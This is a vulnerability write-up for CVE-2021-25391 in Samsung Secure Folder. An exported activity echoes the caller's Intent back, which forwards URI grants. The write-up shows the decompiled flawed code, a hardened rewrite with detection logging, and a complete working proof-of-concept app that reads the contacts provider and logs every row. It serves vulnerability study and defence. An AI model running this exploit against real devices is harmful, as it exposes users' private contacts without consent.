[CVE-2021-25391] [Samsung] [Secure Folder] KnoxSettingCheckLockTypeActivity leaks an Intent that can be used to read ContentProvider data
| Date | Version | Description | Author |
| --- | --- | --- | --- |
| 2022.11.20 | 1.0 | Full vulnerability analysis and exploitation | wnagzihxa1n |
0x00 Vulnerability overview
I did not find this vulnerability entirely on my own: while reading the code I could feel that this pattern was wrong, but at first I did not understand the vulnerability model.
Secure Folder on Samsung phones leaks an Intent. By crafting that Intent appropriately, a caller can obtain Secure Folder's permissions (in this case, URI permissions on a ContentProvider that Secure Folder is allowed to read).
0x01 Trigger conditions
| Release date | App name | Package name | Version | MD5 | Download link |
| --- | --- | --- | --- | --- | --- |
| | Secure Folder | com.samsung.knox.securefolder | 1.6.01.61 | 67bc4cec5ab436e1711cc98c43cc417e | |
0x02 PoC
0x03 Prerequisite knowledge
0x04 Root Cause Analysis
The component com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity is exported:
```xml
<activity
    android:exported="true"
    android:launchMode="singleTask"
    android:name="com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity"
    android:resizeableActivity="false"
    android:taskAffinity="com.samsung.knox.securefolder"/>
```
At [1] the incoming Intent is sent straight back out as the activity result, so we obtain an Intent that belongs to Secure Folder. Because that Intent still carries the data URI and the FLAG_GRANT_*_URI_PERMISSION flags set by the caller, the system performs the URI grant on Secure Folder's behalf when the result is delivered; by crafting the Intent appropriately, an attacker therefore obtains Secure Folder's permissions.
```java
// com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity
// Decompiler output, cleaned up: the original shadowed the Bundle parameter with an int
// and cast int values to boolean, which is not valid Java. Behaviour is unchanged.
@Override // android.app.Activity
protected void onCreate(Bundle bundle) {
    super.onCreate(bundle);
    Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate in overlay_post_container_v24");
    this.mChooseLockSettingshelper = new KnoxSettingsChooseLockSettingsHelper(this);
    // 16 == DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS
    DevicePolicyManager dpm = (DevicePolicyManager) this.getSystemService("device_policy");
    boolean isAllowed = (dpm.getKeyguardDisabledFeatures(null) & 16) == 0;
    Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate come from trust agent. isAllowed: " + isAllowed);
    if (isAllowed) {
        boolean z = this.mChooseLockSettingshelper.launchConfirmationActivity(0x409, null, null);
        Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate result: " + z);
        return;
    }
    Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate send intent back");
    // [1] The caller's own Intent, data URI and grant flags included, is returned unchanged.
    this.setResult(0, this.getIntent()); // [1]
    this.finish();
}
```
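For comparison, a hardened version of the same onCreate, written here as an added example rather than Samsung's actual patch: the result Intent is built from scratch instead of echoing getIntent(), and any incoming Intent that combines grant flags with a data URI or ClipData is logged and rejected. The helper names carriesUriGrant and buildResult and the extra key lock_type_checked are assumptions.

```java
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

public class KnoxSettingCheckLockTypeActivity extends Activity {
    private static final String TAG = "KnoxSettingCheckLockTypeActivity";
    private static final int URI_GRANT_FLAGS =
            Intent.FLAG_GRANT_READ_URI_PERMISSION
            | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
            | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
            | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION;

    // True when passing this Intent on via setResult()/startActivity() would make the
    // system grant URI access on this app's behalf: grant flags plus a data URI or
    // ClipData. (Assumed helper name, not from the original code.)
    static boolean carriesUriGrant(Intent i) {
        if (i == null || (i.getFlags() & URI_GRANT_FLAGS) == 0) return false;
        return i.getData() != null || i.getClipData() != null;
    }

    // Builds the result from scratch: nothing from the caller's Intent (data, ClipData,
    // flags, extras) is copied, so there is no grant to forward. (Assumed helper name.)
    static Intent buildResult(boolean lockTypeChecked) {
        Intent result = new Intent();
        result.putExtra("lock_type_checked", lockTypeChecked); // assumed extra key
        return result;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent incoming = getIntent();
        if (carriesUriGrant(incoming)) {
            // Detection point: an exported settings activity has no reason to receive
            // URI grants, so record the caller and refuse without returning its Intent.
            Log.w(TAG, "rejecting Intent with URI grant flags from " + getCallingPackage());
            setResult(RESULT_CANCELED);
            finish();
            return;
        }
        // The original lock-type / trust-agent check would run here.
        setResult(RESULT_OK, buildResult(false));
        finish();
    }
}
```

Even without the rejection branch, replacing setResult(0, getIntent()) with a freshly built Intent is enough to close the grant-forwarding path; the check adds a log line a detection team can alert on.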
0x05 Debugging and exploitation
This is the PoC from Oversecured's lab; I learned a lot from it as well.
```java
import android.app.Activity;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.provider.ContactsContract;
import android.util.Log;

// Class name is a placeholder; the original fragment did not show it.
public class PocActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Explicit Intent to the exported Secure Folder activity, carrying grant flags
        // and a contacts URI that this app itself has no permission to read.
        Intent i = new Intent();
        i.setClassName("com.samsung.knox.securefolder", "com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity");
        i.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
        i.setData(ContactsContract.RawContacts.CONTENT_URI);
        startActivityForResult(i, 0);
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);
        // The returned Intent is the one Secure Folder echoed back at [1].
        if (data != null && data.getData() != null) {
            dump(data.getData());
        }
    }

    private void dump(Uri uri) {
        Cursor cursor = getContentResolver().query(uri, null, null, null, null);
        if (cursor == null) {
            return;
        }
        try {
            if (cursor.moveToFirst()) {
                do {
                    StringBuilder sb = new StringBuilder();
                    for (int i = 0; i < cursor.getColumnCount(); i++) {
                        if (sb.length() > 0) {
                            sb.append(", ");
                        }
                        sb.append(cursor.getColumnName(i) + " = " + cursor.getString(i));
                    }
                    Log.d("evil", sb.toString());
                } while (cursor.moveToNext());
            }
        } finally {
            cursor.close();
        }
    }
}
```
0x06 Vulnerability research
0x07 References
《Two weeks of securing Samsung devices: Part 1》
https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-1/
Appendix: debugging process notes